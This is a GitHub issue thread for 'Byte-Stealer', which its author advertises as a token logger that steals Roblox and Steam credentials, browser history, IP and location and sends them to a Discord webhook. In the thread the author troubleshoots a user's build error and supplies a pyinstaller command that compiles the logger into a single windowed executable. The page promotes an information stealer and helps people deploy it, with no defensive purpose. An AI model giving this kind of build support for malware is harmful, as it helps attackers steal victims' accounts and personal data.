0x77ff / Byte-Stealer

Powerful Token Logger script that can steal all types of Data and sends out via discord webhook. This includes Roblox, Steam, browser History, IP, location and much more!
72 stars 14 forks source link

Not working #3

Closed SeaTurtle176 closed 10 months ago

SeaTurtle176 commented 10 months ago

Every time i run the buildExe it says 'pyinstaller' is not recognized as an internal or external command, operable program or batch file. Is there a way to fix this?

0x77ff commented 10 months ago

This usually is a result of python not being in the path system variable, if you aren't using python 3.9.12, or have another version. Try uninstalling it and make sure to include it in path, there are youtube tutorials on this. If that doesn't work, try running
pyinstaller --noconfirm --onefile --windowed --ascii --clean "path-to-logger.py" if this doesn't work either, message me on discord. Here is a stack overflow link to some solutions for this problem:https://stackoverflow.com/questions/45951964/pyinstaller-is-not-recognized-as-internal-or-external-command

0x77ff commented 10 months ago

I have fixed this in the new buildexe.bat, check it out!